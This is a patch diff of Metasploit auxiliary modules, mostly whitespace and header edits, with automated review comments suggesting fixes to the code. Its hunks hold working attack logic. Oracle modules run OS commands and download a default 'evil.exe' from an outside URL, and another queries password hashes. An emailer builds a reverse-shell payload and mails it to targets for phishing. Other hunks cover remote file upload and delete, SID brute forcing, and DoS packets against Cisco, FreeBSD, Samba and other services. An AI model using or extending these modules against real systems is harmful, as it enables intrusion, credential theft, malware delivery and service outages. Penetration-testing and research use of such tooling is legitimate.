to discover easily guessed accounts.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,


@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -10,7 +14,7 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::ORACLE
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle SQL Generic Query',
@ -28,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Dec 7 2007'))
register_options(
register_options(
[
OptString.new('SQL', [ false, 'The SQL to execute.', 'select * from v$version']),
], self.class)
@ -49,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
rescue => e
return
return
end
end


@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -11,7 +15,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::ORACLE
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle Database Enumeration',
@ -43,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
end
print_status("Running Oracle Enumeration....")
#Version Check
query = 'select * from v$version'
ver = prepare_exec(query)
@ -52,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("\t#{v.chomp}")
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Component Version: #{v.chomp}")
end
#Saving Major Release Number for other checks
majorrel = ver[0].scan(/Edition Release (\d*)./)
@ -77,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
#-------------------------------------------------------
#Security Settings
print_status("Security Settings:")
@ -129,7 +133,7 @@ class Metasploit3 < Msf::Auxiliary
print_error("It appears you do not have sufficient rights to perform the check")
end
end
begin
query = %Q|
SELECT limit
@ -146,7 +150,7 @@ class Metasploit3 < Msf::Auxiliary
print_error("It appears you do not have sufficient rights to perform the check")
end
end
begin
query = %Q|
SELECT limit
@ -163,7 +167,7 @@ class Metasploit3 < Msf::Auxiliary
print_error("It appears you do not have sufficient rights to perform the check")
end
end
begin
query = %Q|
SELECT limit
@ -245,7 +249,7 @@ class Metasploit3 < Msf::Auxiliary
if majorrel.join.to_i < 11
query = %Q|
SELECT name, password
SELECT name, password
FROM sys.user$
where password != 'null' and type# = 1 and astatus = 0
|
@ -278,7 +282,7 @@ class Metasploit3 < Msf::Auxiliary
begin
if majorrel.join.to_i < 11
query = %Q|
SELECT username, password
SELECT username, password
FROM dba_users
WHERE account_status = 'EXPIRED & LOCKED'
|


@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -15,9 +19,9 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info,
'Name' => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',
'Description' => %q{
This module exploits an authentication bypass vulnerability
in login.php in order to execute arbitrary code via a command injection
vulnerability in property_box.php. This module was tested
This module exploits an authentication bypass vulnerability
in login.php in order to execute arbitrary code via a command injection
vulnerability in property_box.php. This module was tested
against Oracle Secure Backup version 10.3.0.1.0 (Win32).
},
'Author' => [ 'MC' ],
@ -44,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary
def run
cmd = datastore['CMD']
res = send_request_cgi(
{
'uri' => '/login.php',
@ -57,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
sessionid = res.headers['Set-Cookie'].split(';')[0]
print_status("Sending command: #{datastore['CMD']}...")
send_request_cgi(
{
'uri' => '/property_box.php',
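Review bot: `sessionid = res.headers['Set-Cookie'].split(';')[0]` dereferences the header without checking it exists, so a login response with no Set-Cookie (or a nil `res` after a failed request) ends in a NoMethodError instead of a clear message. Unless that is already handled in the lines collapsed between this hunk and the previous one, a guard before the split such as `return print_error("Login did not return a session cookie") unless res && res.headers['Set-Cookie']` would fail cleanly. `run` starts in the previous hunk and continues past this one.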

@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -10,7 +14,7 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::ORACLE
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle Java execCommand (Win32)',
@ -26,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Dec 7 2007'))
register_options(
register_options(
[
OptString.new('CMD', [ false, 'The OS command to execute.', 'echo metasploit > %SYSTEMDRIVE%\\\\unbreakable.txt']),
], self.class)
@ -52,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
"
procedure = "
create or replace procedure #{name} (p_command in varchar2)
create or replace procedure #{name} (p_command in varchar2)
as language java
name '#{source}.execCommand (java.lang.String)';
"
@ -61,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary
drops = "drop java source #{source}"
dropp = "drop procedure #{name}"
dropp = "drop procedure #{name}"
begin
print_status("Creating java source '#{source}'...")

@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -10,7 +14,7 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::ORACLE
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle URL Download',
@ -27,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Feb 2003'))
register_options(
register_options(
[
OptString.new('URL', [ false, 'The URL to download the binary from.', 'http://www.meh.com/evil.exe']),
OptString.new('COPYTO', [ false, 'Location to copy the binary to', 'c:\\meh.exe']),
@ -66,11 +70,11 @@ class Metasploit3 < Msf::Auxiliary
NAME 'FileUpload.fileUpload (java.lang.String, java.lang.String)';
"
exec = "begin PROC_FILEUPLOAD ('#{datastore['COPYTO']}', '#{datastore['URL']}'); end;"
exec = "begin PROC_FILEUPLOAD ('#{datastore['COPYTO']}', '#{datastore['URL']}'); end;"
drops = "drop java source SRC_FILE_UPLOAD"
dropp = "drop procedure PROC_FILEUPLOAD"
dropp = "drop procedure PROC_FILEUPLOAD"
begin
print_status("Creating java source 'SRC_FILE_UPLOAD'...")

@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -28,12 +32,12 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Jan 7 2009'))
register_options(
[
Opt::RPORT(1521),
OptString.new('SLEEP', [ false, 'Sleep() amount between each request.', '1']),
OptString.new('SIDFILE', [ false, 'The file that contains a list of sids.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'sid.txt')]),
], self.class)
register_options(
[
Opt::RPORT(1521),
OptString.new('SLEEP', [ false, 'Sleep() amount between each request.', '1']),
OptString.new('SIDFILE', [ false, 'The file that contains a list of sids.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'sid.txt')]),
], self.class)
end
@ -43,9 +47,9 @@ class Metasploit3 < Msf::Auxiliary
list = datastore['SIDFILE']
print_status("Starting brute force on #{rhost}, using sids from #{list}...")
fd = File.open(list).each do |sid|
login = "(DESCRIPTION=(CONNECT_DATA=(SID=#{sid})(CID=(PROGRAM=)(HOST=MSF)(USER=)))(ADDRESS=(PROTOCOL=tcp)(HOST=#{rhost})(PORT=#{rport})))"
pkt = tns_packet(login)
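Review bot: `File.open(list).each do |sid|` yields each wordlist line with its trailing newline, so the newline is interpolated into `(SID=#{sid})` on the next line unless it is stripped somewhere in the collapsed part of the block; the File object that `each` returns is also kept in `fd` and never closed in the visible code. `File.foreach(list) do |line|` followed by `sid = line.strip` and `next if sid.empty?` reads the file line by line, closes it when the loop finishes and drops blank entries. Both `run` and this block continue past the hunk.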

@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -24,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
'Version' => '$Revision$',
'DisclosureDate' => 'Feb 1 2009'))
register_options(
register_options(
[
Opt::RPORT(1521),
OptString.new('CMD', [ false, 'Something like ping, version, status, etc..', '(CONNECT_DATA=(COMMAND=VERSION))']),
@ -42,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Sending '#{command}' to #{rhost}:#{rport}")
sock.put(pkt)
print_status("writing #{pkt.length} bytes.")
sleep(0.5)
print_status("reading")
@ -52,6 +56,6 @@ class Metasploit3 < Msf::Auxiliary
res = res.tr("\177",".")
puts res
disconnect
disconnect
end
end

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Pop2
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'UoW pop2d Remote File Retrieval Vulnerability',
'Description' => %q{
This module exploits a vulnerability in the FOLD command of the

@ -15,7 +15,7 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Postgres
def initialize(info = {})
super(update_info(info,
'Name' => 'PostgreSQL Server Generic Query',
@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
OptString.new('RFILE', [ true, 'The remote file', '/etc/passwd'])
], self.class)
deregister_options( 'SQL', 'RETURN_ROWSET' )
deregister_options( 'SQL', 'RETURN_ROWSET' )
end
def rhost
@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary
def rport
datastore['RPORT']
end
def run
ret = postgres_read_textfile(datastore['RFILE'])
verbose = datastore['VERBOSE']
@ -68,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary
print_error "#{rhost}:#{rport} Postgres - #{ret[:sql_error]}"
end
when :complete
print_good "#{rhost}:#{rport} Postgres - Command complete." if verbose
print_good "#{rhost}:#{rport} Postgres - Command complete." if verbose
end
postgres_logout if self.postgres_conn
end

@ -15,7 +15,7 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Postgres
def initialize(info = {})
super(update_info(info,
'Name' => 'PostgreSQL Server Generic Query',
@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
'Version' => '$Revision$'
))
register_options( [ ], self.class) # None needed.
register_options( [ ], self.class) # None needed.
end
def rhost
@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary
def rport
datastore['RPORT']
end
def run
ret = postgres_query(datastore['SQL'],datastore['RETURN_ROWSET'])
verbose = datastore['VERBOSE']
@ -52,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary
when :sql_error
print_error "#{rhost}:#{rport} Postgres - #{ret[:sql_error]}"
when :complete
print_good "#{rhost}:#{rport} Postgres - Command complete." if verbose
print_good "#{rhost}:#{rport} Postgres - Command complete." if verbose
end
postgres_logout if self.postgres_conn
end

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
include Rex::Platforms::Windows
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'TrendMicro ServerProtect File Access',
'Description' => %q{
This modules exploits a remote file access flaw in the ServerProtect Windows
@ -47,25 +47,23 @@ class Metasploit3 < Msf::Auxiliary
[ 'list' ]
]
))
register_options(
[
Opt::RPORT(5168),
OptString.new('RPATH',
[
false,
"The remote filesystem path",
nil
]
),
OptString.new('LPATH',
[
false,
"The local filesystem path",
nil
]
),
], self.class)
register_options(
[
Opt::RPORT(5168),
OptString.new('RPATH',
[
false,
"The remote filesystem path",
nil
]),
OptString.new('LPATH',
[
false,
"The local filesystem path",
nil
]),
], self.class)
end
def check_option(name)
@ -73,9 +71,9 @@ class Metasploit3 < Msf::Auxiliary
raise RuntimeError, "The #{name} parameter is required by this option"
end
end
def auxiliary_commands
{
{
"delete" => "Delete a file",
"download" => "Download a file",
"upload" => "Upload a file",
@ -92,15 +90,15 @@ class Metasploit3 < Msf::Auxiliary
when 'upload'
check_option('RPATH')
check_option('LPATH')
cmd_upload(datastore['RPATH'], datastore['LPATH'])
cmd_upload(datastore['RPATH'], datastore['LPATH'])
when 'delete'
check_option('RPATH')
cmd_delete(datastore['RPATH'])
cmd_delete(datastore['RPATH'])
when 'list'
check_option('RPATH')
cmd_list(datastore['RPATH'])
else
print_error("Unknown action #{action.name}")
print_error("Unknown action #{action.name}")
end
end
@ -110,9 +108,9 @@ class Metasploit3 < Msf::Auxiliary
#
# Once this function is used, if cmd_download or cmd_upload is called the server will crash :/
#
#
def cmd_list(*args)
if (args.length < 1)
print_status("Usage: list folder")
return
@ -126,7 +124,7 @@ class Metasploit3 < Msf::Auxiliary
# FindFirstFile
resp = serverprotect_rpccmd(131080, data, 0x100)
return if not resp
if resp.length != 0x108
print_status("An unknown error occured while calling FindFirstFile.")
return
@ -143,7 +141,7 @@ class Metasploit3 < Msf::Auxiliary
file = deunicode(resp[0x30, 0xd0])
print("#{file}\n")
data = "\0" * 0x100
data[0,4] = [handle].pack('V')
@ -151,7 +149,7 @@ class Metasploit3 < Msf::Auxiliary
# FindNextFile
resp = serverprotect_rpccmd(131081, data, 0x100)
return if not resp
if resp.length != 0x108
print_status("An unknown error occured while calling FindFirstFile.")
break
@ -174,7 +172,7 @@ class Metasploit3 < Msf::Auxiliary
def cmd_delete(*args)
if (args.length == 0)
print_status("Usage: delete c:\\windows\\system.ini")
return
@ -183,7 +181,7 @@ class Metasploit3 < Msf::Auxiliary
data = Rex::Text.to_unicode(args[0]+"\0")
resp = serverprotect_rpccmd(131077, data, 4)
return if not resp
if (resp.length == 12)
ret, = resp[8,4].unpack('V')
@ -198,12 +196,12 @@ class Metasploit3 < Msf::Auxiliary
def cmd_download(*args)
if (args.length < 2)
print_status("Usage: download remote_file local_file")
return
end
# GENERIC_READ: 0x80000000
# FILE_SHARE_READ: 1
# OPEN_EXISTING: 3
@ -231,7 +229,7 @@ class Metasploit3 < Msf::Auxiliary
def cmd_upload(*args)
if (args.length < 2)
print_status("Usage: upload local_file remote_file")
return
@ -271,7 +269,7 @@ class Metasploit3 < Msf::Auxiliary
resp = serverprotect_rpccmd(131073, data, 540)
return if not resp
if (resp.length < 548)
print_status("An unknown error occurred while calling CreateFile.")
return 0
@ -363,7 +361,7 @@ class Metasploit3 < Msf::Auxiliary
padding = ""
end
stub =
stub =
NDR.long(cmd) +
NDR.long(data.length) +
data +
@ -373,14 +371,14 @@ class Metasploit3 < Msf::Auxiliary
return serverprotect_rpc_call(0, stub)
end
#
# Call the serverprotect RPC service
#
#
def serverprotect_rpc_call(opnum, data = '')
begin
connect
handle = dcerpc_handle(
@ -400,7 +398,7 @@ class Metasploit3 < Msf::Auxiliary
disconnect
outp
rescue ::Interrupt
raise $!
rescue ::Exception => e
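Review bot: `rescue ::Exception => e` catches everything the `::Interrupt` clause above it does not, including SystemExit and NoMemoryError, so an `exit` issued while the RPC call is in flight is swallowed here; `rescue ::StandardError => e` keeps the apparent intent (report the error and return nil, as the following hunk seems to show) while letting fatal exceptions propagate. The `raise $!` on the line above can simply be `raise`. `serverprotect_rpc_call` starts in the previous hunk and its rescue body continues into the next.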
@ -408,5 +406,5 @@ class Metasploit3 < Msf::Auxiliary
nil
end
end
end

@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -33,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Apr 28 2009'))
register_options(
register_options(
[
Opt::RPORT(12174),
OptString.new('CMD', [ false, 'The OS command to execute', 'cmd /c echo metasploit > %SYSTEMDRIVE%\metasploit.txt']),
@ -44,19 +48,19 @@ class Metasploit3 < Msf::Auxiliary
begin
connect
len = 2 + datastore['CMD'].length
len = 2 + datastore['CMD'].length
data = [0x00000000].pack('V')
data << len.chr
data << "\x00"
data << datastore['CMD'] + " "
data << "\x00"
print_status("Sending command: #{datastore['CMD']}")
print_status("Sending command: #{datastore['CMD']}")
sock.put(data)
res = sock.get_once
if (!res)
print_error("Did not recieve data. Failed?")
else

@ -1,6 +1,9 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -23,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'Generic Emailer (SMTP)',
'Description' => %q{
This module can be used to automate email delivery.
This code is based on Joshua Abraham's email script for social
This code is based on Joshua Abraham's email script for social
engineering.
},
'License' => MSF_LICENSE,
@ -31,26 +34,26 @@ class Metasploit3 < Msf::Auxiliary
'References' =>
[
[ 'URL', 'http://spl0it.org/' ],
],
],
'Author' => [ 'et <et[at]metasploit.com>' ]))
register_options(
[
[
OptString.new('RHOST', [true, "SMTP server address",'127.0.0.1']),
OptString.new('RPORT', [true, "SMTP server port",'25']),
OptString.new('YAML_CONFIG', [true, "Full path to YAML Configuration file",File.join(Msf::Config.install_root, "data","emailer_config.yaml")]),
], self.class)
# Hide this option from the user
], self.class)
# Hide this option from the user
deregister_options('MAILTO')
end
def run
fileconf = File.open(datastore['YAML_CONFIG'])
yamlconf = YAML::load(fileconf)
fileto = yamlconf['to']
yamlconf = YAML::load(fileconf)
fileto = yamlconf['to']
from = yamlconf['from']
subject = yamlconf['subject']
type = yamlconf['type']
@ -63,7 +66,7 @@ class Metasploit3 < Msf::Auxiliary
attachment_file = yamlconf['attachment_file']
attachment_file_type = yamlconf['attachment_file_type']
attachment_file_name = yamlconf['attachment_file_name']
### payload options ###
make_payload = yamlconf['make_payload']
zip_payload = yamlconf['zip_payload']
@ -77,35 +80,35 @@ class Metasploit3 < Msf::Auxiliary
datastore['MAILFROM'] = from
msg = File.open(msg_file).read
email_sig = File.open(sig_file).read
if (type !~ /text/i and type !~ /text\/html/i)
if (type !~ /text/i and type !~ /text\/html/i)
print_error("YAML config: #{type}")
end
if make_payload
if make_payload
print_status("Creating payload...")
system(
"#{msf_location}/msfpayload #{msf_payload} LHOST=#{msf_ip} LPORT=#{msf_port} R | #{msf_location}/msfencode -t exe -o /tmp/#{msf_filename} > /dev/null 2>&1")
if msf_change_ext
if msf_change_ext
msf_payload_newext = msf_filename
msf_payload_newext = msf_payload_newext.sub(/\.\w+$/, ".#{msf_payload_ext}")
File.rename("/tmp/#{msf_filename}", "/tmp/#{msf_payload_newext}")
msf_filename = msf_payload_newext
end
if zip_payload
if zip_payload
zip_file = msf_filename
zip_file = zip_file.gsub(/\.\w+/, '.zip')
system("zip -r /tmp/#{zip_file} /tmp/#{msf_filename} > /dev/null 2>&1");
msf_filename = zip_file
attachment_file_type = 'application/zip'
else
else
attachment_file_type = 'application/exe'
end
@ -118,17 +121,17 @@ class Metasploit3 < Msf::Auxiliary
if l !~ /\@/
nil
end
nem = l.split(',')
name = nem[0].split(' ')
fname = name[0]
lname = name[1]
email = nem[1]
if add_name
email_msg_body = "#{fname},\n\n#{msg}"
else
if add_name
email_msg_body = "#{fname},\n\n#{msg}"
else
email_msg_body = msg
end
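Review bot: `if l !~ /\@/ nil end` is a no-op — evaluating `nil` neither skips the line nor leaves the block — so a recipient line without an @ still reaches `nem = l.split(',')` and is mailed to whatever `nem[1]` yields (nil when there is no comma); assuming this sits inside the recipient `each` block that begins before the hunk, it should be `next unless l =~ /@/`. In the same `run` method, `File.open(datastore['YAML_CONFIG'])`, `File.open(msg_file).read` and `File.open(sig_file).read` in the earlier hunks leave their handles open; `File.read(msg_file)` and a block form for the YAML handle close them. `run` continues past this hunk.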
@ -136,7 +139,7 @@ class Metasploit3 < Msf::Auxiliary
data_sig = File.open(sig_file).read
email_msg_body = "#{email_msg_body}\n#{data_sig}"
end
print_status("Emailing #{name[0]} #{name[1]} at #{email}")
mime_msg = Rex::MIME::Message.new
@ -146,22 +149,20 @@ class Metasploit3 < Msf::Auxiliary
mime_msg.to = email
datastore['MAILTO'] = email.strip
mime_msg.subject = subject
mime_msg.add_part(Rex::Text.encode_base64(email_msg_body, "\r\n"), type, "base64", "inline")
if attachment
if attachment_file_name
data_attachment = File.open(attachment_file).read
mime_msg.add_part(Rex::Text.encode_base64(data_attachment, "\r\n"), attachment_file_type, "base64", "attachment; filename=\"#{attachment_file_name}\"")
end
end
send_message(mime_msg.to_s)
sleep wait
sleep wait
end
print_status("Email sent..")
end
end
end

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -17,12 +17,12 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Cisco IOS HTTP GET /%% request Denial of Service',
'Description' => %q{
This module triggers a Denial of Service condition in the Cisco IOS
This module triggers a Denial of Service condition in the Cisco IOS
HTTP server. By sending a GET request for "/%%", the device becomes
unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. This module
tested successfully against a Cisco 1600 Router IOS v11.2(18)P.
@ -43,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary
[
Opt::RPORT(80),
], self.class)
end
def run

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -17,12 +17,12 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'FreeBSD Remote NFS RPC Request Denial of Service',
'Description' => %q{
This module sends a specially-crafted NFS Mount request causing a
This module sends a specially-crafted NFS Mount request causing a
kernel panic on host running FreeBSD 6.0.
},
'Author' => [ 'MC' ],
@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'OSVDB', '23511' ],
[ 'CVE', '2006-0900' ],
]))
register_options([Opt::RPORT(2049),], self.class)
end
@ -45,11 +45,11 @@ class Metasploit3 < Msf::Auxiliary
pkt = "\x80\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02"
pkt << "\x00\x01\x86\xa5\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00"
pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04"
print_status("Sending dos packet...")
sock.put(pkt)
disconnect
end

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => '3Com SuperStack Switch Denial of Service',
'Description' => %q{
This module causes a temporary denial of service condition
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'URL', 'http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf' ],
],
'DisclosureDate' => 'Jun 24 2004'))
register_options( [ Opt::RPORT(80) ], self.class )
end
@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
rescue ::Errno::ECONNRESET
print_status("DoS packet successful. #{rhost} not responding.")
end
end
end
end

@ -15,27 +15,27 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Apache mod_isapi <= 2.2.14 Dangling Pointer',
'Description' => %q{
This module triggers a use-after-free vulnerability in the Apache Software
Foundation mod_isapi extension. In order to reach the vulnerable code, the
Foundation mod_isapi extension. In order to reach the vulnerable code, the
target server must have an ISAPI module installed and configured.
By making a request that terminates abnormally (either an aborted TCP connection or
an unsatisfied chunked request), mod_isapi will unload the ISAPI extension. Later,
if another request comes for that ISAPI module, previously obtained pointers will
if another request comes for that ISAPI module, previously obtained pointers will
be used resulting in an access violation or potentially arbitrary code execution.
Although arbitrary code execution is theoretically possible, a real-world method of
Although arbitrary code execution is theoretically possible, a real-world method of
invoking this consequence has not been proven. In order to do so, one would need to
find a situation where a particular ISAPI module loads at an image base address
that can be re-allocated by a remote attacker.
Limited success was encountered using two separate ISAPI modules. In this scenario,
a second ISAPI module was loaded into the same memory area as the previously
a second ISAPI module was loaded into the same memory area as the previously
unloaded module.
},
'Author' =>

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,10 +19,10 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Dell OpenManage POST Request Heap Overflow (win32)',
'Description' => %q{
This module exploits a heap overflow in the Dell OpenManage
This module exploits a heap overflow in the Dell OpenManage
Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability
exists due to a boundary error within the handling of POST requests,
where the application input is set to an overly long file name.
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'CVE', '2004-0331' ],
],
'DisclosureDate' => 'Feb 26 2004'))
register_options(
[
Opt::RPORT(1311),
@ -63,4 +63,4 @@ class Metasploit3 < Msf::Auxiliary
disconnect
end
end
end

@ -3,10 +3,10 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# http://metasploit.com/framework/
##
require 'msf/core'
@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Ruby WEBrick::HTTP::DefaultFileHandler DoS',
'Description' => %q{
The WEBrick::HTTP::DefaultFileHandler in WEBrick in
@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Request sent to #{rhost}:#{rport}")
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_status("Couldn't connect to #{rhost}:#{rport}")
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -27,9 +27,9 @@ class Metasploit3 < Msf::Auxiliary
'Author' => 'kris katterjohn',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' => [
'References' => [
[ 'CVE', '2008-5081' ],
[ 'OSVDB', '50929' ],
[ 'OSVDB', '50929' ],
],
'DisclosureDate' => 'Nov 14 2008')
@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary
n.l3.id = 0xbeef
n.l3.ttl = 128
n.l3.flags = 2
n.l4 = Racket::L4::UDP.new
n.l4.src_port = 0
n.l4.dst_port = datastore['RPORT'].to_i

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -17,10 +17,10 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB
include Msf::Auxiliary::Dos
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Samba lsa_io_privilege_set Heap Overflow',
'Description' => %q{
This module triggers a heap overflow in the LSA RPC service
@ -35,18 +35,18 @@ class Metasploit3 < Msf::Auxiliary
['OSVDB', '34699'],
]
))
register_options(
[
OptString.new('SMBPIPE', [ true, "The pipe name to use", 'LSARPC']),
], self.class)
end
def run
pipe = datastore['SMBPIPE'].downcase
print_status("Connecting to the SMB service...")
connect()
smb_login()
@ -61,13 +61,13 @@ class Metasploit3 < Msf::Auxiliary
# Linux: Needs heap magic to work around glibc (or TALLOC mode for 3.0.20+)
# Mac OS X: PC control via memcpy to stack ptr
# Solaris: PC control via memcpy to stack ptr
stub = lsa_open_policy(dcerpc)
stub << NDR.long(1)
stub << NDR.long(0xffffffff)
stub << NDR.long(0x100)
stub << "X" * 0x100
print_status("Calling the vulnerable function...")
begin
@ -82,8 +82,8 @@ class Metasploit3 < Msf::Auxiliary
raise e
end
end
disconnect
disconnect
end
end

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -17,10 +17,10 @@ class Metasploit3 < Msf::Auxiliary
